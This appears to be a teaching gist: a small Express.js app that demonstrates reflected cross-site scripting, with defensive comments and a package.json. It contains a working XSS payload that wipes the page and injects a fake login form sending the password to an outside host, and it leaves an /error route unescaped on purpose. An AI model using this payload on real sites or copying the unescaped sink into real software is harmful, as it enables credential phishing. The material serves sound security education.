@CarlOlson
Created February 7, 2017 23:02
// Example of Server Reflected XSS
// https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting
const express = require('express');
const session = require('express-session');
// Express application instance that every route below is registered on.
const app = express();
// TCP port handed to app.listen() at the bottom of the file.
const port = 3000;
// Demo markup that the vulnerable /error page echoes back without encoding.
// It shows the impact of reflected XSS from the defender's side: once markup
// from the URL is rendered as HTML, the injected script can blank the real
// page and the injected form can pose as a login prompt that submits to a
// third-party host. The fragments are joined with no separator, so the value
// is a single line of HTML.
const payload = [
  '<script>',
  "document.body.innerHTML = '';",
  '</script>',
  '<form action="http://urlecho.appspot.com/echo" method="get">',
  '<input placeholder="username" />',
  '<input type="password" placeholder="password" name="body" />',
  '<button type="submit">Login</button>',
  '</form>',
].join('');
// Session middleware: req.session carries the error text from the catch-all
// route to the /error page across the redirect.
// NOTE(review): 'secret' is a hard-coded, guessable signing key. That is
// tolerable only in a throwaway demo; a real deployment should load a long
// random value from the environment or a secret store.
const sessionOptions = {
  secret: 'secret',
  resave: false, // do not rewrite sessions that were not modified
  saveUninitialized: false, // do not store sessions that hold no data
};
app.use(session(sessionOptions));
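// Landing page of the demo: renders one link whose path is the URI-encoded
// payload. Following it hits the catch-all route, which copies the path into
// the session and redirects to the vulnerable /error page.
// The link is built from `port` instead of a second literal 3000, so it
// cannot drift from the port the server actually listens on.
app.get('/', (req, resp) => {
  const target = `http://localhost:${port}/${encodeURI(payload)}`;
  resp.send(`<a href="${target}">Malicious link</a>`);
});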
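// Vulnerable sink, left unescaped on purpose for this demo: the stored error
// text contains the attacker-influenced request path and is sent as HTML
// without encoding, so any markup in it is rendered by the browser.
// Mitigation in real code: HTML-encode the message before sending, or answer
// with resp.type('text/plain'); a Content-Security-Policy adds defence in depth.
app.get('/error', (req, resp) => {
  const message = req.session.error || '';
  // Clear the message BEFORE responding. express-session writes the session
  // back when the response ends, so an assignment made after send() is never
  // stored and the same message would be replayed on every later visit.
  // Only touch the session when there is something to clear, so a visitor
  // without a pending error does not get a session created for them.
  if (message) {
    req.session.error = '';
  }
  resp.send(message);
});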
// Catch-all for every path not matched above. This is the taint source of the
// demo: the requested path comes straight from the URL (attacker-controlled)
// and is stored in the session without validation or encoding, then shown by
// the /error page after the redirect.
app.get(/(.*)/, (req, resp) => {
  const requestedPath = req.params[0];
  req.session.error = `page not found: ${requestedPath}`;
  resp.redirect('/error');
});
// Start the HTTP server. No host argument is given, so Node listens on the
// unspecified address (all interfaces).
// NOTE(review): for a deliberately vulnerable demo, passing '127.0.0.1' as
// the host would keep it reachable from the local machine only.
app.listen(port);
{
"name": "xss",
"version": "1.0.0",
"description": "",
"main": "index.js",
"scripts": {
"start": "node index.js"
},
"author": "",
"license": "ISC",
"dependencies": {
"express": "^4.14.1",
"express-session": "^1.15.0"
}
}